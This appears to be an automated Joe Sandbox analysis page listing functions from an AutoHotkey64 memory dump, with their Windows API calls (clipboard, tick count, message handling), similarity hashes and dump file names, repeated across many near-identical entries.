Opcode ID: 268c1b93e8ce23eb91cbce635ca31194d99325ced065378517a4f4eb5023373a
Instruction ID: dd0f1d2eb2439dfa8b1a4332cba4db6ff994e717635b49f9619803758cb9105d
Opcode Fuzzy Hash: 268c1b93e8ce23eb91cbce635ca31194d99325ced065378517a4f4eb5023373a
Instruction Fuzzy Hash: 2F91B2B160464486F7668B27E4843E937E1F34DBE4F11022AEB59A3BF6DB38C491C745

Function 000000014004601E Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B4EA0: GetFullPathNameW.KERNEL32(?,?,?,000000014004603F), ref: 00000001400B4EF9
Part of subcall function 00000001400B4EA0: GetPrivateProfileStringW.KERNEL32 ref: 00000001400B4F35

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseFullGlobalMessageNamePathPeekPrivateProfileStringUnlock
String ID:
API String ID: 3404763234-0
Opcode ID: aaa5a61d6fb6fa007f80f3f2523df651170dfe2546af1c648663ae46b367468d
Instruction ID: 67bdd8155ed44371e43aa12a6c8ae60b2311c131e00c1a64272d1472555a0708
Opcode Fuzzy Hash: aaa5a61d6fb6fa007f80f3f2523df651170dfe2546af1c648663ae46b367468d
Instruction Fuzzy Hash: 8591B2B1604A4486F7668B27E4843E937A1F78DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140044585 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: d1e52f2feaf76f6175d46a308f957b2534830d491cac93961697262de6aa0127
Instruction ID: 4861400d3b5cf577daeb625046542374006ef00bbc5f2a09383a5aaf91896e35
Opcode Fuzzy Hash: d1e52f2feaf76f6175d46a308f957b2534830d491cac93961697262de6aa0127
Instruction Fuzzy Hash: ED91A3B1604A4486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C494C745

Function 0000000140044668 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005C5E0: GetWindowTextLengthW.USER32 ref: 000000014005C60E

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalLengthMessagePeekTextUnlockWindow
String ID:
API String ID: 1215013059-0
Opcode ID: 607be492186d70aa13509c54bd32738ec88ec59e36c05a47c7b94a99d1079e2e
Instruction ID: c67e9426a893926d1a8a9c6b9c219c338c011d5575cee439734875718313ef7c
Opcode Fuzzy Hash: 607be492186d70aa13509c54bd32738ec88ec59e36c05a47c7b94a99d1079e2e
Instruction Fuzzy Hash: DC91B2B1604A4486F7668B27E4843E937A1F78DBE4F11022AFB5963BF6DB38C490C745

Function 000000014004468E Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9a68fe563402c882addf0251fe6c250d71caa501adf475b7ac0c9dbfa1e9f628
Instruction ID: 102a1ee81f39eec1a1616e720d7543fce0c67e409f804aea000cd53a73ec5eeb
Opcode Fuzzy Hash: 9a68fe563402c882addf0251fe6c250d71caa501adf475b7ac0c9dbfa1e9f628
Instruction Fuzzy Hash: 7C91A2B1604A4486F7668B27E4843E937A1F78DBE4F11022AEB5963BF6DB38C490C745

Function 0000000140044E13 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014006C670: wcsncpy.LIBCMT ref: 000000014006C6C9
Part of subcall function 000000014006C670: SetVolumeLabelW.KERNEL32 ref: 000000014006C714

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalLabelMessagePeekUnlockVolumewcsncpy
String ID:
API String ID: 2345973108-0
Opcode ID: bf4752fece9043d6864d6a153f2a90b68f62e13e14f32b275886960ad6323be5
Instruction ID: 33bfc7b8dcd45a17d6dc81da3c46c5473144704a95a2d42ef770dc9b82215f8a
Opcode Fuzzy Hash: bf4752fece9043d6864d6a153f2a90b68f62e13e14f32b275886960ad6323be5
Instruction Fuzzy Hash: 6691A3B1604A4486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C494C745

Function 0000000140045043 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: b22628a0efb71ae06d00463a51bdbf1c75cf4baad888d670a93daa05fd501b90
Instruction ID: 1d5160964faa64bdd9b3fdd799f262102d63962f23aaa19c9093c5f86d7cb3ee
Opcode Fuzzy Hash: b22628a0efb71ae06d00463a51bdbf1c75cf4baad888d670a93daa05fd501b90
Instruction Fuzzy Hash: FA91B3B1604A4486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C490C745

Function 00000001400453A1 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140070CE0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,0000000140039F46), ref: 0000000140070D23

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseCurrentDirectoryGlobalMessagePeekUnlock
String ID:
API String ID: 1560712716-0
Opcode ID: 53b3467019293b88826b59100fe5fa8e1de193efdc767810fc7839c39b013933
Instruction ID: 1243502fac54585abe19fe1ef03391d804f7839ca832f68acb39d843becd0278
Opcode Fuzzy Hash: 53b3467019293b88826b59100fe5fa8e1de193efdc767810fc7839c39b013933
Instruction Fuzzy Hash: C391A4B160464486F7668B27E4843E937E1F34DBE4F11022AFB5963AF6DB38C494C745

Function 00000001400453F2 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 1da7e3d02efc1179c51f8ec4abb1de164485bed54adcb3a8b7d03291c65bb041
Instruction ID: 668456d10fa7ebc874de616b13a3f5fd27e545dd358645ec9f92ceebd019fa59
Opcode Fuzzy Hash: 1da7e3d02efc1179c51f8ec4abb1de164485bed54adcb3a8b7d03291c65bb041
Instruction Fuzzy Hash: 0A91B3B1604A4486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140045889 Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140052420: wcsncpy.LIBCMT ref: 00000001400524E0
Part of subcall function 0000000140052420: wcsncpy.LIBCMT ref: 0000000140052500
Part of subcall function 0000000140052420: Shell_NotifyIconW.SHELL32 ref: 0000000140052515

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$wcsncpy$ClipboardCloseGlobalIconMessageNotifyPeekShell_Unlock
String ID:
API String ID: 34998114-0
Opcode ID: cc3b2448d063f9fa2a293ec88a9b3a0331015b38b0df60e15b6e47c73352d10c
Instruction ID: cd2a3af279a0df48de6fd6997473300782bdacff043229362859acb45b4536f1
Opcode Fuzzy Hash: cc3b2448d063f9fa2a293ec88a9b3a0331015b38b0df60e15b6e47c73352d10c
Instruction Fuzzy Hash: A19192B1604A4486F7668B27E4843E937A1F78DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140044571 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005AB10: SendMessageTimeoutW.USER32 ref: 000000014005ACBC

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: 1a97b019457cfb5727dcd69d0316aa4630c20655e8cba8d2a2e787eedf5227e5
Instruction ID: 325628cbda732e344edb834dd90c7d98e8d99e4267d2715868d040d9e31bc5ff
Opcode Fuzzy Hash: 1a97b019457cfb5727dcd69d0316aa4630c20655e8cba8d2a2e787eedf5227e5
Instruction Fuzzy Hash: 4E91C2B1604A4486F7668B27E4843E937E1F38DBE4F11022AFB5963AF6DB38C490C745

Function 000000014004474A Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: b839fde8de430655906832cd8195653f6971f845396f890aa2a543eef60c691d
Instruction ID: eb3c5b2b51b95b9c521b8f4bd2fa546ed617be3f9a02df97eb9bb1535dfcc240
Opcode Fuzzy Hash: b839fde8de430655906832cd8195653f6971f845396f890aa2a543eef60c691d
Instruction Fuzzy Hash: B691B2B1604A4486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140044DFC Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014006C280: wcsncpy.LIBCMT ref: 000000014006C2C4
Part of subcall function 000000014006C280: GetDiskFreeSpaceExW.KERNEL32 ref: 000000014006C325

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseDiskFreeGlobalMessagePeekSpaceUnlockwcsncpy
String ID:
API String ID: 833027430-0
Opcode ID: fd66f43a7e3a93665d7b26a61bdc0ebb9fa2ed4bcd4c6483bb97091e2c3b375b
Instruction ID: 4177c6077edf563ddcc694fc42cea08040382dfb6cfac8b2cc5e20e1336bbe26
Opcode Fuzzy Hash: fd66f43a7e3a93665d7b26a61bdc0ebb9fa2ed4bcd4c6483bb97091e2c3b375b
Instruction Fuzzy Hash: 9F91B2B160464486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C494C745

Function 0000000140044E35 Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e400514f1bdbcc076bf6233b4c76455c9dbef90e304f83b196b37643990e7710
Instruction ID: 8d9994cdd9ae42b871ef677544237bae31590eee4288713f91733216287a8e54
Opcode Fuzzy Hash: e400514f1bdbcc076bf6233b4c76455c9dbef90e304f83b196b37643990e7710
Instruction Fuzzy Hash: E791B2B160464486F7668B27E4843E937A1F34DBE4F11022AEB5963BF6DB38C490C745

Function 0000000140044FCE Relevance: 9.2, APIs: 6, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140072AE0: _wcstoi64.LIBCMT ref: 0000000140072B48

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
